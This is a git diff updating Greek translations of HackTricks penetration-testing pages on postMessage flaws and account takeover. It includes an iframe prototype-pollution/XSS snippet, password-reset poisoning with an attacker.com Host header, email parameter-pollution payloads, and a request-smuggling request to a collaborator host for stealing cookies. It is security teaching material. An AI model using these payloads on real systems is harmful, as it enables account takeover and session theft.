Ως αποτέλεσμα, όταν ανοίγεται ένα αναδυόμενο παράθυρο υπό αυτές τις συνθήκες και αποστέλλεται ένα μήνυμα από το iframe στο αναδυόμενο παράθυρο χρησιμοποιώντας **`postMessage`**, τόσο η αποστολή όσο και η λήψη έχουν τις προελεύσεις τους ορισμένες σε `null`. Αυτή η κατάσταση οδηγεί σε ένα σενάριο όπου η **`e.origin == window.origin`** αξιολογείται ως αληθής (`null == null`), επειδή τόσο το iframe όσο και το αναδυόμενο παράθυρο μοιράζονται την ίδια τιμή προέλευσης του `null`.
|
||||
|
||||
Για περισσότερες πληροφορίες **διαβάστε**:
|
||||
|
||||
|
@ -159,7 +157,7 @@ result.message; // "'"<b>\"
|
|||
|
||||
### Παράκαμψη e.source
|
||||
|
||||
Είναι δυνατό να ελεγχθεί αν το μήνυμα προήλθε από το ίδιο παράθυρο στο οποίο ο κώδικας ακούει (ιδιαίτερα ενδιαφέρον για **Σενάρια Περιεχομένου από επεκτάσεις προγραμμάτων περιήγησης** για να ελέγξουν αν το μήνυμα στάλθηκε από την ίδια σελίδα):
|
||||
Είναι δυνατόν να ελέγξετε αν το μήνυμα προήλθε από το ίδιο παράθυρο στο οποίο ο κώδικας ακούει (ιδιαίτερα ενδιαφέρον για **Σενάρια Περιεχομένου από επεκτάσεις προγράμματος περιήγησης** για να ελέγξετε αν το μήνυμα στάλθηκε από την ίδια σελίδα):
|
||||
```javascript
|
||||
// If it’s not, return immediately.
|
||||
if( received_message.source !== window ) {
|
||||
|
@ -176,7 +174,7 @@ return;
|
|||
|
||||
### Παράκαμψη X-Frame-Header
|
||||
|
||||
Για να εκτελέσετε αυτές τις επιθέσεις ιδανικά θα πρέπει να **τοποθετήσετε την ιστοσελίδα θύματος** μέσα σε ένα `iframe`. Αλλά κάποια headers όπως το `X-Frame-Header` μπορεί να **εμποδίσουν** αυτή τη **συμπεριφορά**.\
|
||||
Για να εκτελέσετε αυτές τις επιθέσεις ιδανικά θα πρέπει να **τοποθετήσετε την ιστοσελίδα θύματος** μέσα σε ένα `iframe`. Αλλά ορισμένοι κεφαλίδες όπως το `X-Frame-Header` μπορεί να **εμποδίσουν** αυτή τη **συμπεριφορά**.\
|
||||
Σε αυτά τα σενάρια μπορείτε ακόμα να χρησιμοποιήσετε μια λιγότερο αθόρυβη επίθεση. Μπορείτε να ανοίξετε ένα νέο tab στην ευάλωτη εφαρμογή και να επικοινωνήσετε μαζί της:
|
||||
```markup
|
||||
<script>
|
||||
|
@ -184,15 +182,15 @@ var w=window.open("<url>")
|
|||
setTimeout(function(){w.postMessage('text here','*');}, 2000);
|
||||
</script>
|
||||
```
|
||||
### Κλοπή μηνύματος που στάλθηκε στο παιδί με τον φραγμό της κύριας σελίδας
|
||||
### Κλοπή μηνύματος που στάλθηκε στο παιδί μπλοκάροντας την κύρια σελίδα
|
||||
|
||||
Στην παρακάτω σελίδα μπορείτε να δείτε πως μπορείτε να κλέψετε ευαίσθητα δεδομένα που στάλθηκαν μέσω **postmessage** σε ένα **παιδικό iframe** με τον τρόπο του **φραγμού** της **κύριας** σελίδας πριν από την αποστολή των δεδομένων και εκμεταλλευόμενοι ένα **XSS στο παιδί** για να **διαρρεύσουν τα δεδομένα** πριν τα λάβει:
|
||||
Στην παρακάτω σελίδα μπορείτε να δείτε πως μπορείτε να κλέψετε ευαίσθητα δεδομένα που στάλθηκαν μέσω **postmessage** σε ένα **παιδικό iframe** μπλοκάροντας την **κύρια** σελίδα πριν σταλούν τα δεδομένα και εκμεταλλευόμενοι ένα **XSS στο παιδί** για να **διαρρεύσουν τα δεδομένα** πριν φτάσουν:
|
||||
|
||||
{% content-ref url="blocking-main-page-to-steal-postmessage.md" %}
|
||||
[blocking-main-page-to-steal-postmessage.md](blocking-main-page-to-steal-postmessage.md)
|
||||
{% endcontent-ref %}
|
||||
|
||||
### Κλοπή μηνύματος με την τροποποίηση της τοποθεσίας του iframe
|
||||
### Κλοπή μηνύματος με τροποποίηση της τοποθεσίας του iframe
|
||||
|
||||
Αν μπορείτε να ενσωματώσετε μια ιστοσελίδα μέσω iframe χωρίς X-Frame-Header που περιέχει άλλο iframe, μπορείτε να **αλλάξετε την τοποθεσία του παιδικού iframe**, έτσι αν λαμβάνει ένα **postmessage** που στάλθηκε χρησιμοποιώντας ένα **wildcard**, ένας επιτιθέμενος μπορεί να **αλλάξει** την τοποθεσία του iframe αυτού σε μια σελίδα που **ελέγχεται** από αυτόν και να **κλέψει** το μήνυμα:
|
||||
|
||||
|
@ -202,11 +200,11 @@ setTimeout(function(){w.postMessage('text here','*');}, 2000);
|
|||
|
||||
### postMessage σε Prototype Pollution και/ή XSS
|
||||
|
||||
Σε περιπτώσεις όπου τα δεδομένα που στέλνονται μέσω `postMessage` εκτελούνται από JS, μπορείτε να **ενσωματώσετε** τη **σελίδα** και να **εκμεταλλευτείτε** τη **διαρροή πρωτοτύπου/XSS** στέλνοντας την εκμετάλλευση μέσω `postMessage`.
|
||||
Σε περιπτώσεις όπου τα δεδομένα που στέλνονται μέσω `postMessage` εκτελούνται από JS, μπορείτε να **ενσωματώσετε** τη **σελίδα** μέσω iframe και να **εκμεταλλευτείτε** τη **διαρροή πρωτοτύπου/XSS** στέλνοντας το exploit μέσω `postMessage`.
|
||||
|
||||
Μερικά **πολύ καλά εξηγημένα XSS μέσω `postMessage`** μπορούν να βρεθούν στο [https://jlajara.gitlab.io/web/2020/07/17/Dom\_XSS\_PostMessage\_2.html](https://jlajara.gitlab.io/web/2020/07/17/Dom\_XSS\_PostMessage\_2.html)
|
||||
|
||||
Παράδειγμα μιας εκμετάλλευσης για την κατάχρηση της **Διαρροής Πρωτοτύπου και στη συνέχεια XSS** μέσω ενός `postMessage` σε ένα `iframe`:
|
||||
Παράδειγμα εκμετάλλευσης για κατάχρηση **Διαρροής Πρωτοτύπου και στη συνέχεια XSS** μέσω ενός `postMessage` σε ένα `iframe`:
|
||||
```html
|
||||
<html>
|
||||
<body>
|
||||
|
@ -224,7 +222,7 @@ setTimeout(get_code, 2000);
|
|||
```
|
||||
Για **περισσότερες πληροφορίες**:
|
||||
|
||||
* Σύνδεσμος στη σελίδα για το [**prototype pollution**](../deserialization/nodejs-proto-prototype-pollution/)
|
||||
* Σύνδεσμος στη σελίδα για το [**πρωτότυπο ρύπανσης**](../deserialization/nodejs-proto-prototype-pollution/)
|
||||
* Σύνδεσμος στη σελίδα για το [**XSS**](../xss-cross-site-scripting/)
|
||||
* Σύνδεσμος στη σελίδα για το [**client side prototype pollution to XSS**](../deserialization/nodejs-proto-prototype-pollution/#client-side-prototype-pollution-to-xss)
|
||||
|
||||
|
@ -234,9 +232,9 @@ setTimeout(get_code, 2000);
|
|||
* [https://dev.to/karanbamal/how-to-spot-and-exploit-postmessage-vulnerablities-36cd](https://dev.to/karanbamal/how-to-spot-and-exploit-postmessage-vulnerablities-36cd)
|
||||
* Για πρακτική: [https://github.com/yavolo/eventlistener-xss-recon](https://github.com/yavolo/eventlistener-xss-recon)
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io) είναι μια μηχανή αναζήτησης που τροφοδοτείται από το **dark web** και προσφέρει δωρεάν λειτουργίες για να ελέγξετε αν μια εταιρεία ή οι πελάτες της έχουν **διαρρεύσει** από **κλέφτες κακόβουλων λογισμικών**.
|
||||
|
||||
|
@ -252,10 +250,10 @@ setTimeout(get_code, 2000);
|
|||
|
||||
Άλλοι τρόποι υποστήριξης του HackTricks:
|
||||
|
||||
* Αν θέλετε να δείτε την **εταιρεία σας να διαφημίζεται στο HackTricks** ή να **κατεβάσετε το HackTricks σε PDF** ελέγξτε τα [**ΣΧΕΔΙΑ ΣΥΝΔΡΟΜΗΣ**](https://github.com/sponsors/carlospolop)!
|
||||
* Αν θέλετε να δείτε την **εταιρεία σας διαφημισμένη στο HackTricks** ή να **κατεβάσετε το HackTricks σε PDF** ελέγξτε τα [**ΣΧΕΔΙΑ ΣΥΝΔΡΟΜΗΣ**](https://github.com/sponsors/carlospolop)!
|
||||
* Αποκτήστε το [**επίσημο PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Ανακαλύψτε [**την Οικογένεια PEASS**](https://opensea.io/collection/the-peass-family), τη συλλογή μας από αποκλειστικά [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Εγγραφείτε στη** 💬 [**ομάδα Discord**](https://discord.gg/hRep4RUj7f) ή στη [**ομάδα τηλεγραφήματος**](https://t.me/peass) ή **ακολουθήστε** μας στο **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
|
||||
* **Μοιραστείτε τα χάκινγκ κόλπα σας υποβάλλοντας PRs στα** [**HackTricks**](https://github.com/carlospolop/hacktricks) και [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) αποθετήρια του github.
|
||||
* **Εγγραφείτε** στην 💬 [**ομάδα Discord**](https://discord.gg/hRep4RUj7f) ή στην [**ομάδα τηλεγραφήματος**](https://t.me/peass) ή **ακολουθήστε** μας στο **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
|
||||
* **Μοιραστείτε τα χάκινγκ κόλπα σας υποβάλλοντας PRs** στα αποθετήρια του [**HackTricks**](https://github.com/carlospolop/hacktricks) και του [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).
|
||||
|
||||
</details>
|
||||
|
|
|
@ -4,23 +4,23 @@
|
|||
|
||||
<summary><strong>Μάθετε το χάκινγκ στο AWS από το μηδέν μέχρι τον ήρωα με το</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Ειδικός Ερυθρού Συνεργείου HackTricks AWS)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Άλλοι τρόποι υποστήριξης των HackTricks:
|
||||
Άλλοι τρόποι υποστήριξης του HackTricks:
|
||||
|
||||
* Αν θέλετε να δείτε την **εταιρεία σας διαφημισμένη στα HackTricks** ή να **κατεβάσετε τα HackTricks σε PDF** ελέγξτε τα [**ΣΧΕΔΙΑ ΣΥΝΔΡΟΜΗΣ**](https://github.com/sponsors/carlospolop)!
|
||||
* Αν θέλετε να δείτε την **εταιρεία σας διαφημισμένη στο HackTricks** ή να **κατεβάσετε το HackTricks σε μορφή PDF** ελέγξτε τα [**ΣΧΕΔΙΑ ΣΥΝΔΡΟΜΗΣ**](https://github.com/sponsors/carlospolop)!
|
||||
* Αποκτήστε το [**επίσημο PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Ανακαλύψτε [**την Οικογένεια PEASS**](https://opensea.io/collection/the-peass-family), τη συλλογή μας από αποκλειστικά [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Εγγραφείτε** στην 💬 [**ομάδα Discord**](https://discord.gg/hRep4RUj7f) ή στην [**ομάδα τηλεγραφήματος**](https://t.me/peass) ή **ακολουθήστε** μας στο **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Εγγραφείτε** στην 💬 [**ομάδα Discord**](https://discord.gg/hRep4RUj7f) ή στην [**ομάδα τηλεγράφου**](https://t.me/peass) ή **ακολουθήστε** μας στο **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Μοιραστείτε τα χάκινγκ κόλπα σας υποβάλλοντας PRs** στα [**HackTricks**](https://github.com/carlospolop/hacktricks) και [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) αποθετήρια του github.
|
||||
|
||||
</details>
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io) είναι μια μηχανή αναζήτησης που τροφοδοτείται από το **dark web** και προσφέρει **δωρεάν** λειτουργίες για να ελέγξετε αν μια εταιρεία ή οι πελάτες της έχουν **διαρρεύσει** από **κλέφτες κακόβουλου λογισμικού**.
|
||||
[**WhiteIntel**](https://whiteintel.io) είναι μια μηχανή αναζήτησης που τροφοδοτείται από το **dark web** και προσφέρει **δωρεάν** λειτουργίες για να ελέγξετε αν μια εταιρεία ή οι πελάτες της έχουν **διαρρεύσει** λόγω **κλοπής πληροφοριών** από **κλέφτες κακόβουλου λογισμικού**.
|
||||
|
||||
Ο κύριος στόχος του WhiteIntel είναι η καταπολέμηση της κατάληψης λογαριασμών και των επιθέσεων ransomware που προκύπτουν από κακόβουλο λογισμικό που κλέβει πληροφορίες.
|
||||
Ο κύριος στόχος του WhiteIntel είναι η καταπολέμηση της κατάληψης λογαριασμών και των επιθέσεων ransomware που προκύπτουν από κακόβουλο λογισμικό κλοπής πληροφοριών.
|
||||
|
||||
Μπορείτε να ελέγξετε τον ιστότοπό τους και να δοκιμάσετε τη μηχανή τους δωρεάν στο:
|
||||
|
||||
|
@ -32,7 +32,7 @@
|
|||
|
||||
### Διπλή Εγγραφή
|
||||
|
||||
* Δοκιμάστε να δημιουργήσετε χρησιμοποιώντας ένα υπάρχον όνομα χρήστη
|
||||
* Δοκιμάστε να δημιουργήσετε χρησιμοποιώντας έναν υπάρχοντα όνομα χρήστη
|
||||
* Ελέγξτε ποικίλες μορφές του email:
|
||||
* κεφαλαία γράμματα
|
||||
* \+1@
|
||||
|
@ -49,13 +49,13 @@
|
|||
### Πολιτική Κωδικού Πρόσβασης
|
||||
|
||||
Δημιουργώντας έναν χρήστη ελέγξτε την πολιτική κωδικού πρόσβασης (ελέγξτε αν μπορείτε να χρησιμοποιήσετε αδύναμους κωδικούς πρόσβασης).\
|
||||
Σε αυτήν την περίπτωση μπορείτε να δοκιμάσετε να κάνετε βίαιη επίθεση για διαπιστώσετε διαπιστευτήρια.
|
||||
Σε αυτήν την περίπτωση μπορείτε να δοκιμάσετε να κάνετε βίαιη εισβολή στα διαπιστευτήρια.
|
||||
|
||||
### Εισβολή SQL
|
||||
|
||||
[**Ελέγξτε αυτήν τη σελίδα** ](sql-injection/#insert-statement)για να μάθετε πώς να προσπαθήσετε να καταλάβετε λογαριασμούς ή να εξάγετε πληροφορίες μέσω **SQL Injections** σε φόρμες εγγραφής.
|
||||
[**Ελέγξτε αυτήν τη σελίδα** ](sql-injection/#insert-statement)για να μάθετε πώς να προσπαθήσετε να καταλάβετε λογαριασμούς ή να εξάγετε πληροφορίες μέσω **Εισβολών SQL** σε φόρμες εγγραφής.
|
||||
|
||||
### Επιθέσεις Oauth
|
||||
### Καταλήψεις Oauth
|
||||
|
||||
{% content-ref url="oauth-to-account-takeover.md" %}
|
||||
[oauth-to-account-takeover.md](oauth-to-account-takeover.md)
|
||||
|
@ -69,35 +69,35 @@
|
|||
|
||||
### Αλλαγή Email
|
||||
|
||||
Όταν εγγραφείτε δοκιμάστε να αλλάξετε το email και ελέγξτε αν αυτή η αλλαγή ελέγχεται σωστά ή μπορείτε να το αλλάξετε σε τυχαία emails.
|
||||
Όταν είστε εγγεγραμμένοι δοκιμάστε να αλλάξετε το email και ελέγξτε αν αυτή η αλλαγή ελέγχεται σωστά ή μπορείτε να το αλλάξετε σε τυχαία emails.
|
||||
|
||||
### Περισσότεροι Έλεγχοι
|
||||
|
||||
* Ελέγξτε αν μπορείτε να χρησιμοποιήσετε **προσωρινά emails**
|
||||
* **Μακρύ** **κωδικός** (>200) οδηγεί σε **DoS**
|
||||
* **Ελέγξτε τα όρια ρυθμίσεων στη δημιουργία λογαριασμού**
|
||||
* **Μακρύ** **κωδικός πρόσβασης** (>200) οδηγεί σε **DoS**
|
||||
* **Ελέγξτε τα όρια ρυθμίσεων στη δημιουργία λογαριασμών**
|
||||
* Χρησιμοποιήστε username@**burp\_collab**.net και αναλύστε το **callback**
|
||||
|
||||
## **Κατάληψη Επαναφοράς Κωδικού**
|
||||
|
||||
### Διαρροή Διακριτικού Επαναφοράς Κωδικού μέσω Αναφορέα <a href="#password-reset-token-leak-via-referrer" id="password-reset-token-leak-via-referrer"></a>
|
||||
### Διαρροή Διακριτικού Επαναφοράς Κωδικού Μέσω Referrer <a href="#password-reset-token-leak-via-referrer" id="password-reset-token-leak-via-referrer"></a>
|
||||
|
||||
1. Ζητήστε επαναφορά κωδικού πρόσβασης στη διεύθυνση email σας
|
||||
2. Κάντε κλικ στον σύνδεσμο επαναφοράς κωδικού
|
||||
3. Μην αλλάξετε τον κωδικό
|
||||
4. Κάντε κλικ σε οποιονδήποτε ιστότοπο τρίτων (π.χ.: Facebook, twitter)
|
||||
5. Εμποδίστε το αίτημα στον διακομιστή Burp Suite proxy
|
||||
6. Ελέγξτε αν ο κεφαλίδα αναφορέα διαρρέει το διακριτικό επαναφοράς κωδικού.
|
||||
5. Επικοινωνήστε με το αίτημα στον διακομιστή Burp Suite proxy
|
||||
6. Ελέγξτε αν ο κεφαλίδα αναφοράς (referer) διαρρέει το διακριτικό επαναφοράς κωδικού.
|
||||
|
||||
### Δηλητηρίαση Επαναφοράς Κωδικού <a href="#account-takeover-through-password-reset-poisoning" id="account-takeover-through-password-reset-poisoning"></a>
|
||||
|
||||
1. Εμποδίστε το αίτημα επαναφοράς κωδικού στο Burp Suite
|
||||
1. Επικοινωνήστε με το αίτημα επαναφοράς κωδικού στο Burp Suite
|
||||
2. Προσθέστε ή επεξεργαστείτε τις παρακάτω κεφαλίδες στο Burp Suite: `Host: attacker.com`, `X-Forwarded-Host: attacker.com`
|
||||
3. Προωθήστε το αίτημα με την τροποποιημένη κεφαλίδα\
|
||||
`http POST https://example.com/reset.php HTTP/1.1 Accept: */* Content-Type: application/json Host: attacker.com`
|
||||
4. Αναζητήστε μια διεύθυνση URL επαναφοράς κωδικού βασισμένη στην _κεφαλίδα κεντρικού υπολογιστή_ όπως: `https://attacker.com/reset-password.php?token=TOKEN`
|
||||
4. Αναζητήστε μια διεύθυνση URL επαναφοράς κωδικού βασισμένη στην _κεφαλίδα host_ όπως: `https://attacker.com/reset-password.php?token=TOKEN`
|
||||
|
||||
### Επαναφορά Κωδικού μέσω Παραμέτρου Email <a href="#password-reset-via-email-parameter" id="password-reset-via-email-parameter"></a>
|
||||
### Επαναφορά Κωδικού Μέσω Παραμέτρου Email <a href="#password-reset-via-email-parameter" id="password-reset-via-email-parameter"></a>
|
||||
```powershell
|
||||
# parameter pollution
|
||||
email=victim@mail.com&email=hacker@mail.com
|
||||
|
@ -114,17 +114,17 @@ email=victim@mail.com,hacker@mail.com
|
|||
email=victim@mail.com%20hacker@mail.com
|
||||
email=victim@mail.com|hacker@mail.com
|
||||
```
|
||||
### IDOR on API Parameters <a href="#idor-on-api-parameters" id="idor-on-api-parameters"></a>
|
||||
### IDOR στις Παραμέτρους του API <a href="#idor-on-api-parameters" id="idor-on-api-parameters"></a>
|
||||
|
||||
1. Ο επιτιθέμενος πρέπει να συνδεθεί με τον λογαριασμό του και να μεταβεί στο χαρακτηριστικό **Αλλαγή κωδικού πρόσβασης**.
|
||||
1. Ο Επιτιθέμενος πρέπει να συνδεθεί με τον λογαριασμό του και να μεταβεί στο χαρακτηριστικό **Αλλαγή κωδικού πρόσβασης**.
|
||||
2. Ξεκινήστε το Burp Suite και Εγκαταλείψτε το αίτημα
|
||||
3. Στείλτε το στο καρτέλα repeater και επεξεργαστείτε τις παραμέτρους: Αναγνωριστικό χρήστη/ηλεκτρονικό ταχυδρομείο\
|
||||
3. Στείλτε το στο καρτέλα repeater και επεξεργαστείτε τις παραμέτρους: Αναγνωριστικό Χρήστη/ηλεκτρονικό ταχυδρομείο\
|
||||
`powershell POST /api/changepass [...] ("form": {"email":"victim@email.com","password":"securepwd"})`
|
||||
|
||||
### Weak Password Reset Token <a href="#weak-password-reset-token" id="weak-password-reset-token"></a>
|
||||
### Αδύναμο Διακριτικό Επαναφοράς Κωδικού Πρόσβασης <a href="#weak-password-reset-token" id="weak-password-reset-token"></a>
|
||||
|
||||
Το διακριτικό επαναφοράς κωδικού πρόσβασης πρέπει να δημιουργείται τυχαία και να είναι μοναδικό κάθε φορά.\
|
||||
Προσπαθήστε να καθορίσετε εάν το διακριτικό λήγει ή αν είναι πάντα το ίδιο, σε ορισμένες περιπτώσεις ο αλγόριθμος δημιουργίας είναι αδύναμος και μπορεί να μαντευτεί. Οι ακόλουθες μεταβλητές μπορεί να χρησιμοποιηθούν από τον αλγόριθμο.
|
||||
Προσπαθήστε να καθορίσετε εάν το διακριτικό λήγει ή αν είναι πάντα το ίδιο, σε ορισμένες περιπτώσεις ο αλγόριθμος δημιουργίας είναι αδύναμος και μπορεί να μαντευτεί. Οι παρακάτω μεταβλητές μπορεί να χρησιμοποιούνται από τον αλγόριθμο.
|
||||
|
||||
* Χρονική σήμανση
|
||||
* Αναγνωριστικό Χρήστη
|
||||
|
@ -134,18 +134,18 @@ email=victim@mail.com|hacker@mail.com
|
|||
* Κρυπτογραφία
|
||||
* Μόνο αριθμοί
|
||||
* Μικρή ακολουθία διακριτικού (χαρακτήρες μεταξύ \[Α-Ζ,α-ζ,0-9])
|
||||
* Επαναχρησιμοποίηση διακριτικού
|
||||
* Ημερομηνία λήξης διακριτικού
|
||||
* Επαναχρησιμοποίηση Διακριτικού
|
||||
* Ημερομηνία λήξης Διακριτικού
|
||||
|
||||
### Leaking Password Reset Token <a href="#leaking-password-reset-token" id="leaking-password-reset-token"></a>
|
||||
### Διαρροή Διακριτικού Επαναφοράς Κωδικού Πρόσβασης <a href="#leaking-password-reset-token" id="leaking-password-reset-token"></a>
|
||||
|
||||
1. Ενεργοποιήστε ένα αίτημα επαναφοράς κωδικού χρησιμοποιώντας το API/UI για ένα συγκεκριμένο ηλεκτρονικό ταχυδρομείο, π.χ.: test@mail.com
|
||||
1. Ενεργοποιήστε ένα αίτημα επαναφοράς κωδικού χρησιμοποιώντας το API/UI για ένα συγκεκριμένο ηλεκτρονικό ταχυδρομείο π.χ: test@mail.com
|
||||
2. Επιθεωρήστε την απάντηση του διακομιστή και ελέγξτε το `resetToken`
|
||||
3. Στη συνέχεια χρησιμοποιήστε το διακριτικό σε ένα URL όπως `https://example.com/v3/user/password/reset?resetToken=[ΤΟ_ΔΙΑΚΡΙΤΙΚΟ_ΕΠΑΝΑΦΟΡΑΣ]&email=[ΤΟ_ΗΛΕΚΤΡΟΝΙΚΟ_ΤΑΧΥΔΡΟΜΕΙΟ]`
|
||||
|
||||
### Password Reset Via Username Collision <a href="#password-reset-via-username-collision" id="password-reset-via-username-collision"></a>
|
||||
### Επαναφορά Κωδικού Πρόσβασης Μέσω Σύγκρουσης Ονόματος Χρήστη <a href="#password-reset-via-username-collision" id="password-reset-via-username-collision"></a>
|
||||
|
||||
1. Εγγραφείτε στο σύστημα με ένα όνομα χρήστη που είναι ταυτόσημο με το όνομα χρήστη του θύματος, αλλά με κενά που έχουν εισαχθεί πριν και/ή μετά από το όνομα χρήστη. π.χ.: `"admin "`
|
||||
1. Εγγραφείτε στο σύστημα με ένα όνομα χρήστη που είναι ταυτόσημο με το όνομα χρήστη του θύματος, αλλά με κενά που έχουν εισαχθεί πριν και/ή μετά από το όνομα χρήστη. π.χ: `"admin "`
|
||||
2. Ζητήστε επαναφορά κωδικού με το κακόβουλο όνομα χρήστη.
|
||||
3. Χρησιμοποιήστε το διακριτικό που στάλθηκε στο ηλεκτρονικό σας ταχυδρομείο και επαναφέρετε τον κωδικό του θύματος.
|
||||
4. Συνδεθείτε στον λογαριασμό του θύματος με τον νέο κωδικό.
|
||||
|
@ -153,19 +153,19 @@ email=victim@mail.com|hacker@mail.com
|
|||
Η πλατφόρμα CTFd ήταν ευάλωτη σε αυτήν την επίθεση.\
|
||||
Δείτε: [CVE-2020-7245](https://nvd.nist.gov/vuln/detail/CVE-2020-7245)
|
||||
|
||||
### Account Takeover Via Cross Site Scripting <a href="#account-takeover-via-cross-site-scripting" id="account-takeover-via-cross-site-scripting"></a>
|
||||
### Κατάληψη Λογαριασμού Μέσω Cross Site Scripting <a href="#account-takeover-via-cross-site-scripting" id="account-takeover-via-cross-site-scripting"></a>
|
||||
|
||||
1. Βρείτε ένα XSS μέσα στην εφαρμογή ή ένα υποτομέα αν τα cookies είναι εστιασμένα στο γονικό domain: `*.domain.com`
|
||||
1. Βρείτε ένα XSS μέσα στην εφαρμογή ή ένα υποτομέα αν τα cookies είναι περιορισμένα στο γονικό domain: `*.domain.com`
|
||||
2. Διαρρεύστε το τρέχον **cookie συνεδρίας**
|
||||
3. Ταυτοποιηθείτε ως ο χρήστης χρησιμοποιώντας το cookie
|
||||
|
||||
### Account Takeover Via HTTP Request Smuggling <a href="#account-takeover-via-http-request-smuggling" id="account-takeover-via-http-request-smuggling"></a>
|
||||
### Κατάληψη Λογαριασμού Μέσω HTTP Request Smuggling <a href="#account-takeover-via-http-request-smuggling" id="account-takeover-via-http-request-smuggling"></a>
|
||||
|
||||
1\. Χρησιμοποιήστε το **smuggler** για να ανιχνεύσετε τον τύπο του HTTP Request Smuggling (CL, TE, CL.TE)\
|
||||
1. Χρησιμοποιήστε το **smuggler** για να ανιχνεύσετε τον τύπο του HTTP Request Smuggling (CL, TE, CL.TE)\
|
||||
`powershell git clone https://github.com/defparam/smuggler.git cd smuggler python3 smuggler.py -h`\
|
||||
2\. Δημιουργήστε ένα αίτημα που θα αντικαταστήσει το `POST / HTTP/1.1` με τα ακόλουθα δεδομένα:\
|
||||
2. Δημιουργήστε ένα αίτημα που θα αντικαταστήσει το `POST / HTTP/1.1` με τα ακόλουθα δεδομένα:\
|
||||
`GET http://something.burpcollaborator.net HTTP/1.1 X:` με στόχο την ανοικτή ανακατεύθυνση των θυμάτων στο burpcollab και την κλοπή των cookies τους\
|
||||
3\. Το τελικό αίτημα μπορεί να μοιάζει με το ακόλουθο
|
||||
3. Το τελικό αίτημα μπορεί να μοιάζει με το ακόλουθο
|
||||
```
|
||||
GET / HTTP/1.1
|
||||
Transfer-Encoding: chunked
|
||||
|
@ -177,20 +177,16 @@ Content-Length: 83
|
|||
GET http://something.burpcollaborator.net HTTP/1.1
|
||||
X: X
|
||||
```
|
||||
### Παραβιάσεις από το Hackerone εκμεταλλευόμενες αυτό το σφάλμα\
|
||||
* [https://hackerone.com/reports/737140](https://hackerone.com/reports/737140)\
|
||||
* [https://hackerone.com/reports/771666](https://hackerone.com/reports/771666)
|
||||
### Παραβιάζοντας τον Λογαριασμό μέσω CSRF <a href="#account-takeover-via-csrf" id="account-takeover-via-csrf"></a>
|
||||
|
||||
### Κατάληψη λογαριασμού μέσω CSRF <a href="#account-takeover-via-csrf" id="account-takeover-via-csrf"></a>
|
||||
1. Δημιουργήστε ένα payload για το CSRF, π.χ: "Φόρμα HTML με αυτόματη υποβολή για αλλαγή κωδικού πρόσβασης"
|
||||
2. Αποστείλετε το payload
|
||||
|
||||
1. Δημιουργήστε ένα φορτίο για το CSRF, π.χ: "Φόρμα HTML με αυτόματη υποβολή για αλλαγή κωδικού πρόσβασης"
|
||||
2. Αποστείλετε το φορτίο
|
||||
|
||||
### Κατάληψη λογαριασμού μέσω JWT <a href="#account-takeover-via-jwt" id="account-takeover-via-jwt"></a>
|
||||
### Παραβίαση Λογαριασμού μέσω JWT <a href="#account-takeover-via-jwt" id="account-takeover-via-jwt"></a>
|
||||
|
||||
Το JSON Web Token μπορεί να χρησιμοποιηθεί για την ταυτοποίηση ενός χρήστη.
|
||||
|
||||
* Επεξεργαστείτε το JWT με άλλον αριθμό αναγνωριστικού χρήστη / email
|
||||
* Επεξεργαστείτε το JWT με άλλο User ID / Email
|
||||
* Ελέγξτε για αδύναμη υπογραφή JWT
|
||||
|
||||
{% content-ref url="hacking-jwt-json-web-tokens.md" %}
|
||||
|
@ -202,15 +198,15 @@ X: X
|
|||
* [https://salmonsec.com/cheatsheet/account\_takeover](https://salmonsec.com/cheatsheet/account\_takeover)
|
||||
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io) είναι ένας μηχανισμός αναζήτησης που τροφοδοτείται από το **dark-web** που προσφέρει **δωρεάν** λειτουργίες για να ελέγξετε αν μια εταιρεία ή οι πελάτες της έχουν **διαρρεύσει** από **κλέφτες κακόβουλων λογισμικών**.
|
||||
[**WhiteIntel**](https://whiteintel.io) είναι μια μηχανή αναζήτησης που τροφοδοτείται από το **dark web** και προσφέρει **δωρεάν** λειτουργίες για να ελέγξετε αν μια εταιρεία ή οι πελάτες της έχουν **διαρρεύσει** από **κλέφτες κακόβουλων λογισμικών**.
|
||||
|
||||
Ο κύριος στόχος του WhiteIntel είναι να καταπολεμήσει τις καταλήψεις λογαριασμών και τις επιθέσεις ransomware που προκύπτουν από κακόβουλα λογισμικά που κλέβουν πληροφορίες.
|
||||
Ο κύριος στόχος του WhiteIntel είναι η καταπολέμηση των παραβιάσεων λογαριασμών και των επιθέσεων ransomware που προκύπτουν από κακόβουλα λογισμικά που κλέβουν πληροφορίες.
|
||||
|
||||
Μπορείτε να ελέγξετε την ιστοσελίδα τους και να δοκιμάσετε τον μηχανισμό τους δωρεάν στο:
|
||||
